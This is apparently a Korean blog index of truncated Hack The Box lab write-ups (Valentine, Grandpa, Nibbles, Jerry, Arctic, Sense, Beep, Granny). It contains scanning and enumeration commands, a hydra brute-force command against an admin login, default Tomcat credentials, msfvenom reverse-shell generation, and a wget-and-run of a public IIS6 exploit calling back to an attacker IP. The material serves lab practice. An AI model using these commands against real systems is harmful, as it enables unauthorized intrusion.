Wargame/Hack The Box
-
[HTB] Valentine WriteupWargame/Hack The Box 2022. 1. 29. 23:19
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.182.216 nmap -O -sU -p- -o scanResultUdp.txt 10.129.182.216 nmap -sC -sS -sV -O -F 10.129.182.216 dirb, niko를 통해 활성화 되어있는 웹서비스에서 취약점이 존재하는지 찾아보았다. dirb http://10.129.182.216/ -o dirbResult.txt nikto -h 10.129.182.216 -p 80 -output niktoResult.txt /dev/ 파라미터에 접근해보니 hype_key, notes.txt 파일이 있었다. 그 중 hype_key 파일의 내용은 아래와 같았다. 2d 2d 2d 2d 2d 42 45 47 4..
-
[HTB] Grandpa WriteupWargame/Hack The Box 2022. 1. 27. 19:38
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.95.233 I활성화 되어있는 80포트에서 IS httpd 6.0 서비스를 사용중인걸 알 수 있었고, 접근해보니 아래와 같은 페이지가 나타났다. IIS 6.0 exploit 등 키워드로 검색 결과 아래 레퍼런스를 얻을 수 있었고, 리버스 쉘을 획득하는데 성공했다. https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269 iis6 exploit 2017 CVE-2017-7269..
-
[HTB] Nibbles WriteupWargame/Hack The Box 2022. 1. 23. 21:12
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.180.107 80포트로 접근해보니 아래와 같은 페이지가 안내되었고, /nibbleblog/ 디렉토리에는 다음과같은 블로그페이지가 있었다. 경로에 /admin~ 이 존재하는 것을 보고 접근해보니 디렉토리인덱싱이 발생하는것을 확인 할 수있었다. 또한, 별도의 admin.php 페이지가 존재했다. hydra tool을 활용하여 관리자 계정에 대해 Bruteforce 공격을 해보았지만, 반복횟수에 따른 제한이 있는지 접근이 제한되어버렸다. hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.129.182.134 http-post-form "/nibbleblog/admin.php:..
-
[HTB] Jerry WriteupWargame/Hack The Box 2022. 1. 22. 21:32
공격 대상에 대한 정보를 획득하기 위해 포트스캐닝을 수행해보자. nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.1.110 유일하게 열려있는 8080 포트에 접근해보니, Apache Tomcat 디폴트 페이지가 나왔다. 관리자 페이지의 디폴트 주소인 /manager 에 접근해보니 계정 정보를 요구했다. 기본 관리자 계정 정보인 admin / admin 으로 로그인 하니, 아래와 같은 페이지가 나타났고, manager-gui의 계정 정보를 확인 할 수 있었다. ( tomcat / s3cret ) 다시 로그인 하면 아래와같은 gui 관리자 페이지가 나타난다. 관리자는 war 파일을 통해 업로드를 할 수 있으므로, war형식의 리버스 쉘 파일을 생성했다. msfvenom..
-
[HTB] Arctic WriteupWargame/Hack The Box 2022. 1. 19. 06:58
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.177.205 처음에는 msrpc 위주로 삽질을 해봤지만 큰 성과가 없었다. 8500포트에 대해서는 확실한정보가 주어지지 않았길래, 웹 브라우저를 통해 접근해보았다. 아래와 같은 페이지가 나타났다.(userfiles 디렉토리는 공격 이후 공격으로 인해 생성된 디렉토리이다.) 차근차근 디렉토리들을 탐색해 봤더니(요청하나당 10초이상 걸려서 힘들었다ㅠ) 아래와같은 페이지를 발견할수있었다. ADOBE coldfusion 8 서비스라는 것을 알게되었으니 활용할만한 취약점이 있나 확인해보았다. searchsploit coldfusion 8 RCE 공격이 가능한 exploit 코드가 있길래, 이를 활용해보기로 했다. search..
-
[HTB] Sense WriteupWargame/Hack The Box 2022. 1. 17. 17:57
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.255.245 443 port 에 lighttpd 서비스로 웹페이지가 활성화되어있는것을 알 수 있었다. dirb, gobuster 등을 활용하여 웹페이지의 취약 포인트를 찾아보았다. gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.129.255.245 -x php,txt,conf -o bigList /system-users.txt 에서 계정정보로 추정되는 값을 확인 할 수 있었다. password는 디폴트 값이므로 구글링 결과 pfsense 임을 알 수 있었다. 따라서, rohit / pfsense ..
-
[HTB] Beep WriteupWargame/Hack The Box 2022. 1. 16. 21:31
Port Scanning nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.206.83 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-14 08:04 KST Nmap scan report for 10.129.206.83 Host is up (0.19s latency). Not shown: 65519 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1..
-
[HTB] Granny WriteupWargame/Hack The Box 2022. 1. 13. 22:08
Port Scanning nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.95.234 구글링 결과 어렵지 않게 Reverse Shell Exploit Code를 획득 할 수 있었다. wget https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell mv iis6\ reverse\ shell ii6RS.py python ii6RS.py 10.129.95.234 80 10.10.14.80 1234 하지만, 권한때문에 user.txt와 root.txt를 획득 할 수는 없었다. searchsploit과 구글링을 통해 Windows Server 2003..